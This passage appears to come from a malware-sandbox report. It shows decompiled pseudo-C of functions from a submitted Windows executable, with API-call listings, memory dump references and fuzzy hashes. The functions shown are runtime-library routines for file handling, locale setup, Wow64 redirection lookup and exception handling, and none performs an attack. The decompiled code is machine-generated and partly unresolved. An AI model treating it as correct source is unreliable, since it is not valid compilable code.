								if(SetFilePointer( *_t54, _t41 - _t53, 0, 2) + 1 == 0 || SetEndOfFile( *_t54) != 1) {
									goto L35;
								} else {
									goto L28;
								}
							}
							_t41 = _t41 + 1;
						}
						goto L28;
					}
				}
				_t47 = _t25 - 1;
				if(_t47 == 0) {
					_t26 = 0x40000000;
					_t50 = 1;
					_t49 = 2;
					L7:
					_t54[7] = E00403AF6;
					goto L8;
				}
				_t48 = _t47 - 1;
				if(_t48 == 0) {
					_t26 = 0xc0000000;
					_t50 = 1;
					_t49 = 3;
					goto L7;
				}
				return _t48;
			}

0x00403b3c
0x00403b40
0x00403b43
0x00403b49
0x00403b4e
0x00403b5b
0x00403b60
0x00403b65
0x00403b6a
0x00403b9a
0x00403b9a
0x00403ba1
0x00403bac
0x00403c60
0x00403c6e
0x00403c76
0x00403c70
0x00403c76
0x00403c76
0x00403c7e
0x00403cbb
0x00403cbb
0x00000000
0x00403c80
0x00403c80
0x00403c82
0x00403c89
0x00403ca2
0x00000000
0x00403ca2
0x00403c8d
0x00403c94
0x00403ca8
0x00403cad
0x00000000
0x00403cb4
0x00403c99
0x00403c9b
0x00403c9b
0x00000000
0x00403c99
0x00403c7e
0x00403bb2
0x00403bb4
0x00403bb9
0x00403bba
0x00403bbc
0x00403bbd
0x00403bbe
0x00403bc1
0x00403bc2
0x00403bca
0x00000000
0x00000000
0x00403bd0
0x00403bd9
0x00000000
0x00000000
0x00403bdf
0x00403beb
0x00403bec
0x00000000
0x00000000
0x00403bf2
0x00403bf7
0x00403bf9
0x00403bf9
0x00403c08
0x00000000
0x00403c0e
0x00403c23
0x00403c28
0x00403c2a
0x00000000
0x00000000
0x00403c30
0x00403c32
0x00403c3e
0x00403c52
0x00000000
0x00403c5e
0x00000000
0x00403c5e
0x00403c52
0x00403c40
0x00403c40
0x00000000
0x00403c32
0x00403c08
0x00403b50
0x00403b51
0x00403b73
0x00403b78
0x00403b7d
0x00403b93
0x00403b93
0x00000000
0x00403b93
0x00403b53
0x00403b54
0x00403b84
0x00403b89
0x00403b8e
0x00000000
0x00403b8e
0x00000000

APIs

6D2B5CA0.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403BC2
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403BE6
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403C02
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403C23
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403C4C
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403C56
GetStdHandle.KERNEL32(000000F5), ref: 00403C76
GetFileType.KERNEL32(?,000000F5), ref: 00403C8D
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403CA8
GetLastError.KERNEL32(000000F5), ref: 00403CC2

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$HandlePointer$CloseErrorLastReadSizeType
String ID:
API String ID: 2587015848-0
Opcode ID: 82afb3ba326b040618bb1f5d1ace889cbe7170a3c7233cc425c4da9df6c52ac5
Instruction ID: e865e415cc3bddce3264ca3c3b1bb7a8c5c6c551cb095d29116a0d7d95c160d9
Opcode Fuzzy Hash: 82afb3ba326b040618bb1f5d1ace889cbe7170a3c7233cc425c4da9df6c52ac5
Instruction Fuzzy Hash: 8141A1712086009EF7344F258909B237DE8EB4471AF208A3FA5D6FA6E1D7BD9A05874D

Uniqueness

Uniqueness Score: -1.00%

Function 00408C18 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00408C18() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				char _t3;

				_push("Wow64DisableWow64FsRedirection");
				_t1 = GetModuleHandleA("kernel32.dll");
				_push(_t1);
				L004044F8();
				 *0x40bc98 = _t1;
				_push("Wow64RevertWow64FsRedirection");
				_t2 = GetModuleHandleA("kernel32.dll");
				_push(_t2);
				L004044F8();
				 *0x40bc9c = _t2;
				if( *0x40bc98 == 0 ||  *0x40bc9c == 0) {
					_t3 = 0;
				} else {
					_t3 = 1;
				}
				 *0x40bca0 = _t3;
				return _t3;
			}

0x00408c18
0x00408c22
0x00408c27
0x00408c28
0x00408c2d
0x00408c32
0x00408c3c
0x00408c41
0x00408c42
0x00408c47
0x00408c53
0x00408c5e
0x00408c62
0x00408c62
0x00408c62
0x00408c64
0x00408c69

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,004096BB), ref: 00408C22
6D2B5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,004096BB), ref: 00408C28
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,004096BB), ref: 00408C3C
6D2B5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,004096BB), ref: 00408C42

Strings

Wow64DisableWow64FsRedirection, xrefs: 00408C18
kernel32.dll, xrefs: 00408C1D, 00408C37
Wow64RevertWow64FsRedirection, xrefs: 00408C32

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: B5550HandleModule
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2448194625-4169039593
Opcode ID: 992cc107602789456ca592d3ad42e8660dcff720d91179006d79ed4e4d06c6dc
Instruction ID: 2add19a85ab39d2040d46d45e8b0440f52d8c7f1555a81f654838bd9e1ffd8d4
Opcode Fuzzy Hash: 992cc107602789456ca592d3ad42e8660dcff720d91179006d79ed4e4d06c6dc
Instruction Fuzzy Hash: ACE01AA058E3409DFA007B755F4EB1625709341788F10443FA584761D2CF7C20409B7D

Uniqueness

Uniqueness Score: -1.00%

Function 00405380 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00405380(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t148;
				intOrPtr _t156;

				_t153 = __esi;
				_t152 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(__esi);
				_push(__edi);
				_push(_t156);
				_push(0x4055c8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t156;
				_t104 = GetSystemDefaultLCID();
				E004051C8(_t31, 0, 0x14,  &_v16);
				E004031E8(0x40b494, _t104, _v16, __edi, __esi);
				E004051C8(_t104, 0x4055e0, 0x1b,  &_v16);
				 *0x40b498 = E00404C80(0x4055e0, 0);
				E004051C8(_t104, 0x4055e0, 0x1c,  &_v16);
				 *0x40b499 = E00404C80(0x4055e0, 0);
				 *0x40b49a = E00405214(_t104, 0x2c, 0xf);
				 *0x40b49b = E00405214(_t104, 0x2e, 0xe);
				E004051C8(_t104, 0x4055e0, 0x19,  &_v16);
				 *0x40b49c = E00404C80(0x4055e0, 0);
				 *0x40b49d = E00405214(_t104, 0x2f, 0x1d);
				E004051C8(_t104, "m/d/yy", 0x1f,  &_v16);
				E004031E8(0x40b4a0, _t104, _v16, _t152, _t153);
				E004051C8(_t104, "mmmm d, yyyy", 0x20,  &_v16);
				E004031E8(0x40b4a4, _t104, _v16, _t152, _t153);
				 *0x40b4a8 = E00405214(_t104, 0x3a, 0x1e);
				E004051C8(_t104, 0x405614, 0x28,  &_v16);
				E004031E8(0x40b4ac, _t104, _v16, _t152, _t153);
				E004051C8(_t104, 0x405620, 0x29,  &_v16);
				E004031E8(0x40b4b0, _t104, _v16, _t152, _t153);
				E004051C8(_t104, 0x4055e0, 0x25,  &_v16);
				if(E00404C80(0x4055e0, 0) != 0) {
					E0040322C( &_v8, 0x405638);
				} else {
					E0040322C( &_v8, 0x40562c);
				}
				E004051C8(_t104, 0x4055e0, 0x23,  &_v16);
				if(E00404C80(0x4055e0, 0) != 0) {
					E00403198( &_v12);
				} else {
					E0040322C( &_v12, 0x405644);
				}
				_push(_v8);
				_push(":mm");
				_push(_v12);
				E004033B4();
				_push(_v8);
				_push(":mm:ss");
				_push(_v12);
				E004033B4();
				_pop(_t148);
				 *[fs:eax] = _t148;
				_push(E004055CF);
				return E004031B8( &_v16, 3);
			}

0x00405380
0x00405380
0x00405383
0x00405385
0x00405387
0x0040538a
0x0040538b
0x0040538e
0x0040538f
0x00405394
0x00405397
0x0040539f
0x004053ae
0x004053bb
0x004053d0
0x004053df
0x004053f4
0x00405403
0x00405416
0x00405429
0x0040543e
0x0040544d
0x00405460
0x00405475
0x00405482
0x00405497
0x004054a4
0x004054b7
0x004054cc
0x004054d9
0x004054ee
0x004054fb
0x00405510
0x00405521
0x0040553a
0x00405523
0x0040552b
0x0040552b
0x0040554f
0x00405560
0x00405574
0x00405562
0x0040556a
0x0040556a
0x00405579
0x0040557c
0x00405581
0x0040558e
0x00405593
0x00405596
0x0040559b
0x004055a8
0x004055af
0x004055b2
0x004055b5
0x004055c7

APIs

GetSystemDefaultLCID.KERNEL32(00000000,004055C8,?,?,?,?,00000000,00000000,00000000,?,004065A7,00000000,004065BA), ref: 0040539A

Part of subcall function 004051C8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,00405293,?,00000000,00405372), ref: 004051E6

Part of subcall function 00405214: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00405416,?,?,?,00000000,004055C8), ref: 00405227

Strings

m/d/yy, xrefs: 00405469
:mm:ss, xrefs: 00405596
AMPM, xrefs: 00405565
mmmm d, yyyy, xrefs: 0040548B
:mm, xrefs: 0040557C

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 56806a31754ff9cce930bb3ec31528de0adc6503f6030c8233a4be88310a35d8
Instruction ID: 9bf1190367ce94da82bf36496ac74bdc3e450a6f44cc66b9fb5af58f4e507b24
Opcode Fuzzy Hash: 56806a31754ff9cce930bb3ec31528de0adc6503f6030c8233a4be88310a35d8
Instruction Fuzzy Hash: EA512F34B006487BD700EBA59C81B8F676ADB88304F50C47BB505BB3C6DA3DDA058B5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040375C Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040375C(char* __eax) {
				short _v2064;
				short* _t8;
				short* _t15;
				char* _t16;
				short* _t17;
				int _t18;
				int _t19;

				_t16 = __eax;
				_t18 = E004032F4(__eax);
				if(E004032F4(_t16) >= 0x400) {
					_t8 = MultiByteToWideChar(0, 0, _t16, _t18, 0, 0);
					_t19 = _t8;
					_push(_t19);
					_push(0);
					L00401224();
					_t17 = _t8;
					MultiByteToWideChar(0, 0, _t16, _t18, _t17, _t19);
				} else {
					_push(MultiByteToWideChar(0, 0, E004034B8(_t16), _t18,  &_v2064, 0x400));
					_t15 =  &_v2064;
					_push(_t15);
					L00401224();
					_t17 = _t15;
				}
				return _t17;
			}

0x00403766
0x0040376f
0x0040377d
0x004037b4
0x004037b9
0x004037bb
0x004037bc
0x004037be
0x004037c3
0x004037cd
0x0040377f
0x0040379b
0x0040379c
0x004037a0
0x004037a1
0x004037a6
0x004037a6
0x004037de

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403796
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004037A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004037B4
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004037BE
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004037CD

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: bf6864a40a10f8d5c9f9c3a850e9cb7012b79aac028c98610c7206446ff1e0c0
Instruction ID: 4467adfd160ef2e886eef196ede4891b71e87803e826c11556a0c4038ec11822
Opcode Fuzzy Hash: bf6864a40a10f8d5c9f9c3a850e9cb7012b79aac028c98610c7206446ff1e0c0
Instruction Fuzzy Hash: A4F044A13442843AE56075A65C43FAB198CCB41B6AF10457FF704FA1C2D8B89D05927D

Uniqueness

Uniqueness Score: -1.00%

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401918() {
				signed int _t13;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E004019CE);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40b41c);
				L0040126C();
				if( *0x40b032 != 0) {
					_push(0x40b41c);
					L00401274();
				}
				E004012DC(0x40b43c);
				E004012DC(0x40b44c);
				E004012DC(0x40b478);
				 *0x40b474 = LocalAlloc(0, 0xff8);
				if( *0x40b474 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40b474; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40b460)) = 0x40b45c;
					 *0x40b45c = 0x40b45c;
					 *0x40b468 = 0x40b45c;
					 *0x40b415 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E004019D5);
				if( *0x40b032 != 0) {
					_push(0x40b41c);
					L0040127C();
					return 0;
				}
				return 0;
			}

0x0040191d
0x0040191e
0x00401923
0x00401926
0x00401929
0x0040192e
0x0040193a
0x0040193c
0x00401941
0x00401941
0x0040194b
0x00401955
0x0040195f
0x00401970
0x0040197c
0x0040197e
0x00401983
0x00401983
0x0040198b
0x0040198f
0x00401990
0x0040199c
0x0040199f
0x004019a1
0x004019a6
0x004019a6
0x004019af
0x004019b2
0x004019b5
0x004019c1
0x004019c3
0x004019c8
0x00000000
0x004019c8
0x004019cd

APIs

RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,020B2C80,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,020B2C80,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,020B2C80,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,020B2C80,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: d86d34665db04aebcec5341be5f52ed2604b071df683f4701a97846457825e36
Instruction ID: 1fbc517603835383e1336f1caa5f3efd636d2a280deaa4dd4e997cee02ce5fac
Opcode Fuzzy Hash: d86d34665db04aebcec5341be5f52ed2604b071df683f4701a97846457825e36
Instruction Fuzzy Hash: 2B016DB0A843409EE715AB6A9A56B263AA4D785B04F1484BFF050FA3F3C77C4550C7DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402CCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00402CCC(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v44;
				void* __ebx;
				void* __esi;
				intOrPtr* _t29;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr _t45;
				void* _t48;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t56;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr _t64;
				intOrPtr* _t67;
				intOrPtr _t70;
				intOrPtr _t73;

				_t29 = _a4;
				if(( *(_t29 + 4) & 0x00000006) == 0) {
					if( *_t29 == 0xeedface) {
						_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t29 + 0x18))));
						goto L6;
					} else {
						E0040285C(_t29);
						_t61 =  *0x40b008; // 0x405b4c
						if(_t61 != 0) {
							_t32 =  *_t61();
							if(_t32 != 0) {
								L6:
								_t50 =  *((intOrPtr*)(_a8 + 4));
								_t45 =  *((intOrPtr*)(_t50 + 5));
								_t9 = _t50 + 9; // 0xf
								_t67 = _t9;
								_t70 = _t32;
								while(1) {
									L7:
									_t33 =  *_t67;
									__eflags = _t33;
									if(_t33 == 0) {
										break;
									}
									_t64 = _t70;
									while(1) {
										__eflags = _t33 - _t64;
										if(_t33 == _t64) {
											goto L16;
										}
										__eflags =  *((intOrPtr*)(_t33 - 0x18)) -  *((intOrPtr*)(_t64 - 0x18));
										if( *((intOrPtr*)(_t33 - 0x18)) ==  *((intOrPtr*)(_t64 - 0x18))) {
											_t40 =  *((intOrPtr*)(_t33 - 0x1c));
											_t59 =  *((intOrPtr*)(_t64 - 0x1c));
											_t54 =  *_t40;
											__eflags =  *_t40 -  *_t59;
											if( *_t40 ==  *_t59) {
												__eflags = _t59 + 1;
												E0040270C(_t40 + 1, _t54, _t59 + 1);
												if(__eflags == 0) {
													goto L16;
												}
											}
										}
										_t64 =  *((intOrPtr*)(_t64 - 0x14));
										_t33 =  *_t67;
										__eflags = _t64;
										if(_t64 != 0) {
											continue;
										}
										_t67 = _t67 + 8;
										_t45 = _t45 - 1;
										__eflags = _t45;
										if(_t45 != 0) {
											goto L7;
										}
										goto L19;
									}
									break;
								}
								L16:
								_t34 = _a4;
								__eflags =  *_t34 - 0xeedface;
								_t56 =  *((intOrPtr*)(_t34 + 0x18));
								_t51 =  *((intOrPtr*)(_t34 + 0x14));
								if( *_t34 != 0xeedface) {
									_t56 = E00402B28( *0x40b00c(), _a12);
									_t34 = _a4;
									_t51 =  *((intOrPtr*)(_t34 + 0xc));
								}
								_push( *[fs:ebx]);
								_push(_t34);
								_push(_t56);
								_push(_t51);
								 *(_t34 + 4) =  *(_t34 + 4) | 0x00000002;
								_push(_t67);
								_push(0);
								_push(_t34);
								_push(0x402da8);
								_push(_a8);
								L004011CC();
								_pop(_t48);
								_t35 = E00403154();
								_push( *_t35);
								 *_t35 = _t73;
								 *((intOrPtr*)(_v8 + 4)) = E00402DD4;
								E00402B5C(_v44, _t48, _t67);
								goto ( *((intOrPtr*)(_t48 + 4)));
							} else {
							}
						}
					}
				}
				L19:
				return 1;
			}

0x00402ccc
0x00402cd7
0x00402ce3
0x00402d06
0x00000000
0x00402ce5
0x00402ce5
0x00402cea
0x00402cf2
0x00402cf8
0x00402cfc
0x00402d08
0x00402d10
0x00402d13
0x00402d16
0x00402d16
0x00402d19
0x00402d1b
0x00402d1b
0x00402d1b
0x00402d1d
0x00402d1f
0x00000000
0x00000000
0x00402d21
0x00402d23
0x00402d23
0x00402d25
0x00000000
0x00000000
0x00402d2a
0x00402d2d
0x00402d2f
0x00402d32
0x00402d37
0x00402d39
0x00402d3b
0x00402d3e
0x00402d3f
0x00402d44
0x00000000
0x00000000
0x00402d44
0x00402d3b
0x00402d46
0x00402d49
0x00402d4b
0x00402d4d
0x00000000
0x00000000
0x00402d4f
0x00402d52
0x00402d52
0x00402d53
0x00000000
0x00000000
0x00000000
0x00402d58
0x00000000
0x00402d23
0x00402d5e
0x00402d5e
0x00402d62
0x00402d68
0x00402d6b
0x00402d6e
0x00402d7f
0x00402d81
0x00402d85
0x00402d85
0x00402d8d
0x00402d8e
0x00402d8f
0x00402d90
0x00402d95
0x00402d99
0x00402d9a
0x00402d9c
0x00402d9d
0x00402da2
0x00402da3
0x00402da8
0x00402dad
0x00402db2
0x00402db8
0x00402dc1
0x00402dcc
0x00402dd1
0x00000000
0x00402cfe
0x00402cfc
0x00402cf2
0x00402ce3
0x00402df4
0x00402df9

APIs

RtlUnwind.KERNEL32(?,00402DA8,?,00000000,0000000F,?,?,?,?), ref: 00402DA3

Strings

L[@, xrefs: 00402CEA
`[@, xrefs: 00402D70

Memory Dump Source

Source File: 00000000.00000002.327320339.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.327314061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327331214.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Unwind
String ID: L[@$`[@
API String ID: 3419175465-1751733832
Opcode ID: 461f46f0764b0e976dca9645666d8089b97e2ef70a78bdb8bf6066fcd78b4e55
Instruction ID: 4e34e1b9b67335c333c83c85b531455ae4cd4c13f1293b8a75d41d0fde5a4390
Opcode Fuzzy Hash: 461f46f0764b0e976dca9645666d8089b97e2ef70a78bdb8bf6066fcd78b4e55
Instruction Fuzzy Hash: 1E3160742042019FC714DF05CA88A27B7E5FF88714F1585BAE948AB3E1C775EC42DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403018 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00403018(void* __esi, intOrPtr _a4, signed int _a8) {
				signed int _v12;
				void* _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				void* _t32;
				void* _t33;
				void* _t43;
				void* _t44;

				if(( *(_a4 + 4) & 0x00000006) != 0) {
					__eflags = 0;
					return 0;
				} else {
					__eax = E0040285C(__eax);
					__edx = _a8;
					_push(0);
					_push(__eax);
					_push(0x40303c);
					_push(_a8);
					L004011CC();
					__ebx = _v12;
					__eflags =  *__ebx - 0xeedface;
					__edx =  *(__ebx + 0x14);
					__eax =  *(__ebx + 0x18);
					if( *__ebx == 0xeedface) {
						L38:
						__eax = E00402BE8(__eax, __esi);
						__ecx =  *0x40b000; // 0x405c54
						__eflags = __ecx;
						if(__ecx != 0) {
							__eax =  *__ecx();
						}
						__ecx = _v12;
						__eax = 0xd9;
						__edx =  *(__ecx + 0x14);
						 *__esp =  *(__ecx + 0x14);
						_pop( *0x40b028);
						 *0x40b020 = 0xd9;
						__eflags =  *0x40b030;
						if( *0x40b030 == 0) {
							goto L46;
						} else {
							__eflags =  *0x40b414 - 1;
							if(__eflags < 0) {
								L58:
								ExitProcess( *0x40b020); // executed
							} else {
								if(__eflags == 0) {
									goto L46;
								} else {
									__eax = 0xd9;
									__eflags = 0xd9;
									if(0xd9 != 0) {
										while(1) {
											L46:
											__eax =  *0x40b024; // 0x0
											__eax = __eax;
											__eflags = __eax;
											if(__eax == 0) {
												break;
											}
											__edx = 0;
											 *0x40b024 = 0;
											__eax =  *__eax();
										}
										__eflags =  *0x40b028;
										if( *0x40b028 != 0) {
											__eax =  *0x40b020; // 0x0
											__ebx = "  at 00000000";
											__ecx = 0xa;
											do {
												__edx = 0;
												_t15 = __eax % 0xa;
												__eax = __eax / 0xa;
												__edx = _t15;
												__dl = __dl + 0x30;
												 *__ebx = __dl;
												__ebx = __ebx - 1;
												__eflags = __eax;
											} while (__eax != 0);
											__ebx = 0x40a030;
											__eax =  *0x40b028; // 0x0
											__eax = __eax - 0x401178;
											__eflags = __eax;
											do {
												__edx = __eax;
												__edx = __eax & 0x0000000f;
												__dl =  *((intOrPtr*)(__edx + 0x403ec0));
												 *__ebx =  *((intOrPtr*)(__edx + 0x403ec0));
												__ebx = __ebx - 1;
												__eax = __eax >> 4;
												__eflags = __eax;
											} while (__eax != 0);
											__eflags =  *0x40b031;
											if( *0x40b031 != 0) {
												__eax = 0x40b204;
												__edx = "Runtime error     at 00000000";
												E00404088(0x40b204, "Runtime error     at 00000000") = E0040400B();
											} else {
												__eax = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
											}
										}
										0x40b038 = E00403D6C(0x40b038);
										0x40b204 = E00403D6C(0x40b204); // executed
										__eax = E004019DC(); // executed
										__eflags =  *0x40b414;
										if( *0x40b414 == 0) {
											__eax = E004030B4();
											goto L58;
										}
									}
								}
							}
						}
						__eax = E004030B4();
						 *0x40b414 = 0;
						__eax =  *0x40b020; // 0x0
						__eax =  ~__eax;
						asm("sbb eax, eax");
						__eax = __eax + 1;
						__eflags = __eax;
						__esi =  *0x40b40c; // 0x0
						__ebx =  *0x40b408; // 0x0
						__ebp =  *0x40b404; // 0x0
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						__edx =  *0x40b00c; // 0x405b60
						__eflags = __edx;
						if(__edx == 0) {
							L1:
							_t35 = _v12;
							_t21 =  *_v12;
							_t43 = _t21 - 0xc0000092;
							if(_t43 > 0) {
								__eflags = _t21 - 0xc0000096;
								if(__eflags > 0) {
									_t22 = _t21 - 0xc00000fd;
									__eflags = _t22;
									if(_t22 == 0) {
										_t23 = 0xca;
									} else {
										__eflags = _t22 == 0x3d;
										if(_t22 == 0x3d) {
											_t23 = 0xd9;
										} else {
											goto L32;
										}
									}
								} else {
									if(__eflags == 0) {
										_t23 = 0xda;
									} else {
										_t27 = _t21 - 0xc0000093;
										__eflags = _t27;
										if(_t27 == 0) {
											goto L27;
										} else {
											_t28 = _t27 - 1;
											__eflags = _t28;
											if(_t28 == 0) {
												_t23 = 0xc8;
											} else {
												__eflags = _t28 == 1;
												if(_t28 == 1) {
													_t23 = 0xd7;
												} else {
													goto L32;
												}
											}
										}
									}
								}
							} else {
								if(_t43 == 0) {
									L24:
									_t23 = 0xcf;
								} else {
									_t44 = _t21 - 0xc000008e;
									if(_t44 > 0) {
										__eflags = _t21 + 0x3fffff71 - 2;
										if(__eflags < 0) {
											goto L24;
										} else {
											if(__eflags == 0) {
												_t23 = 0xcd;
											} else {
												goto L32;
											}
										}
									} else {
										if(_t44 == 0) {
											_t23 = 0xc8;
										} else {
											_t32 = _t21 - 0xc0000005;
											if(_t32 == 0) {
												_t23 = 0xd8;
											} else {
												_t33 = _t32 - 0x87;
												if(_t33 == 0) {
													_t23 = 0xc9;
												} else {
													if(_t33 == 1) {
														L27:
														_t23 = 0xce;
													} else {
														L32:
														_t23 = 0xd9;
													}
												}
											}
										}
									}
								}
							}
							return E00402F6C(_t23 & 0x000000ff,  *((intOrPtr*)(_t35 + 0xc)));
						} else {
							__eax = __ebx;
							__eax =  *__edx();
							__eflags = __eax;
							if(__eax == 0) {
								goto L1;
							} else {
								__edx =  *(__ebx + 0xc);
								goto L38;
							}
						}
					}
				}
			}

0x00403023
0x00403090
0x00403092
0x00403025
0x00403025
0x0040302a
0x0040302e
0x00403030
0x00403031
0x00403036
0x00403037
0x0040303c
0x00403040
0x00403046
0x00403049
0x0040304c
0x0040306b
0x0040306b
0x00403070
0x00403076
0x00403078
0x0040307a
0x0040307a
0x0040307c
0x00403080
0x00403085
0x00403088
0x00403ee5
0x00403da8
0x00403dad
0x00403db4
0x00000000
0x00403db6
0x00403db6
0x00403dbd
